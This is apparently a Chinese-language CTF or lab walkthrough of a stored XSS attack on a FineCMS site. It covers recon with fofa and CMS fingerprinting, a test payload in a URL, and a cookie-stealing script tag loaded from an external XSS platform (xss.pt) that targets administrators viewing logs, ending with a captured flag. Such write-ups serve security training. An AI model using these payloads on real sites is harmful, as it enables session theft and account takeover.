存储型XSS

0x00 写在前面

  1. 任何事情切忌脑壳铁, 多听、多看、多梳理才能快速构建自己的知识树 , 因而提高自己的快速检索能力。

  2. 好文推荐 循序渐进理解:跨源跨域,再到 XSS 和 CSRF - 双猫

信息收集

fofa

进入 https://fofa.so 搜索网站地址

整理信息:

操作系统: windows Web容器: apache/2.4.23/(win32) 开发语言版本: php/5.4.45

cms 查询

开发调试工具

cms 指纹工具

这里说一下小插曲, 有些在线 cms 网站装怪, 只能识别域名, IP加端口就不行。

这里, 可以使用 https://www.freenom.com/zh/index.html 搞一个免费域名绑定上, 就可以识别了。

yunsee : https://www.yunsee.cn/ , 收费, 还不能直接给钱。

其他 github 上一大堆指纹识别工具。

假设, 我们通过工具识别出来了是 finecms

Cms 渗透测试

已有漏洞搜索与利用

以铜为鉴,可以正衣冠,以人为鉴,可以知得失,以史为鉴,可以知兴替

搜索 finecms 漏洞 ,得到信息还不少。类似于, sql注入, xss, 上传解析漏洞等比比皆是。

**做事踩坑是必然的, 但遇事不要死脑经。 ** 认真阅读和分析前辈的思路,才能快速拓宽视野,实现厚积薄发

确认 XSS 是否利用

根据文章指出,当访问不存在页面时,可能在日志触发存储型 XSS 利用漏洞。

1. 快速测试

通过浏览器构造页面访问请求,确认 XSS 漏洞是否存在

1
http://59.63.200.79:8082/index.php?c=mail&m=test123<img src=1.png onerror=alert(1)>

经确认, 该 XSS 漏洞可能依旧可以利用。

注册 XSS 平台账户

1. 创建项目

2. 生成偷cookie语句

这里由于是后台日志,非勤劳的站长,可能并不会时时查看日志。 因此, keepsession 打开, 等待鱼儿上钩。

当然, 也可以去喂鱼。

1
<sCRiPt sRC=//xss.pt/94ST></sCrIpT>

3. 利用

在浏览器输入渗透测试语句

http://59.63.200.79:8082/index.php?c=mail&m=test12123<sCRiPt sRC=//xss.pt/xxxxx></sCrIpT>

4. 收网

等待结果

看到有两条鱼儿上钩

获取 flag

flag=zKaQ-01sdfDCo0